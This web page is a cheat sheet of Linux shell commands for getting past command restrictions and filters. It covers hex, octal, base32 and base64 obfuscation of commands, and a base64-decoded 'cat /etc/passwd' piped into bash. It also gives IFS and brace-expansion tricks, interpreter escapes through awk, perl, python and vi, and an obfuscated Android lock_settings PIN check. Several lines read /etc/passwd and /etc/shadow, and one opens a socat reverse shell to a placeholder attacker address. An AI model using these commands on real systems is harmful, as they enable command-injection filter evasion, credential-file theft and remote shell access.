Skip to content

Linux Bypass Techniques: Commands to Circumvent Restrictions

Explore various Linux bypass techniques to circumvent restrictions using shell commands such as hex encoding, echoing, finding files, and more. Enhance your understanding of shell scripting with these effective methods.

Using hex encoding

$(echo -e "\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x77\x68\x6F\x61\x6D\x69")

Test bypass cmd locksettings Andorid

sh -c \
`\
c\
m\
d\
\ \
l\
o\
c\
k\
_\
s\
e\
t\
t\
i\
n\
g\
s\
\ \
\-\
\-\
v\
e\
r\
i\
f\
y\
\ \
1\
4\
7\
8\
9 \
`

List current files and folders

ls *

Using echo for list all files/dirs

echo *

Using find

find -maxdepth 1

Using awk

awk 'BEGIN {system("ls")}'

awk with ls -1

awk 'BEGIN { cmd="ls -1"; while (cmd | getline line) print line; close(cmd) }'

printf and for-loop

for f in *; do printf '%s\n' "$f"; done

Using find with -exec

find . -maxdepth 1 -exec basename {} \;

Using stat

stat -c '%n' *

Using readlink

for f in *; do readlink -f "$f"; done

Using perl

perl -e 'opendir(DIR, "."); @files = readdir(DIR); foreach $file (@files) { print "$file\n"; } closedir(DIR);'

Using python (inline)

python -c 'import os; [print(f) for f in os.listdir(".")]'

Using ruby

ruby -e 'Dir.foreach(".") {|f| puts f}'

Using tee and Process Substitution

ls -1 | tee >(cat)

Using grep on ls output

ls -1 | grep '.\*'

Using mapfile (Bash 4+)

mapfile -t files < <(ls -1); printf '%s\n' "${files[@]}"

Using xargs with ls

ls -1 | xargs -I {} echo {}

Another example of hex encoding""

echo -e '\x70\x69\x6E\x67'

Using ANSI C quoting""

echo $'\x70\x69\x6E\x67'

Using printf""

printf '\x70\x69\x6E\x67'

Using base32 encoding"

# base32
$(echo "L2Jpbi9waW5nCg==" | base32 -d)

Base16 (hex) encoding"

Hex encoding""

$(echo 2f62696e2f77686f616d69 | xxd -r -p)

Octal encoding"

$/usr/bin/who$'\157\141\155\151' #octal encoding

Using command substitution

cat <(echo /etc/passwd)

Variable assignment and indirect reference

cmd="whoami"; $cmd
b=base64; $b<<<$(echo "Y2F0IC9ldGMvcGFzc3dkCg=="| base64 -d)|bash

Using IFS (Internal Field Separator)

IFS='/'; cmd="usr bin whoami"; $cmd

Using HEREDOC

bash <<HERE
whoami
HERE

Using process substitution

bash <(echo "whoami")

Using functions

f() { whoami; }; f

Using alias

alias p='ping'; p localhost

Using brace expansion

echo /{usr,bin}/whoami

Arithmetic expansion

echo $((0x70,0x69,0x6E,0x67))

PATH modification

PATH=.:/usr/bin:/bin; whoami

Hostname lookup

ping $(host -t a "example.com" | grep "has address" | cut -d" " -f4)

DNS TXT record lookup

dig +short txt "example.com"

Using socat for reverse shell

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP:YOUR_PORT

Using awk

awk 'BEGIN {system("whoami")}'

Using perl

perl -e 'exec "/usr/bin/whoami";'

Using python

python -c 'import os; os.system("/usr/bin/whoami")'

Using ruby

ruby -e 'exec "/usr/bin/whoami"'

Using vi/vim

vi -c ':!whoami' -c ':q!'

Using ssh

ssh user@localhost whoami

Using env command

env whoami

Using column command

column < /etc/passwd

Using awk with input redirection

awk '{print}' < /etc/passwd

Using grep with a pattern

grep ".\*" /etc/passwd

Using sed

sed -n 'p' /etc/passwd

Using tac (reverse cat)

tac /etc/shadow | tac

Using tee

cat /etc/passwd | tee

Using xargs

echo /etc/passwd | xargs cat

Using more/less commands

more /etc/passwd

Using head/tail commands

head -n 5 /etc/passwd
tail -n 5 /etc/passwd

Using look

look '' /etc/passwd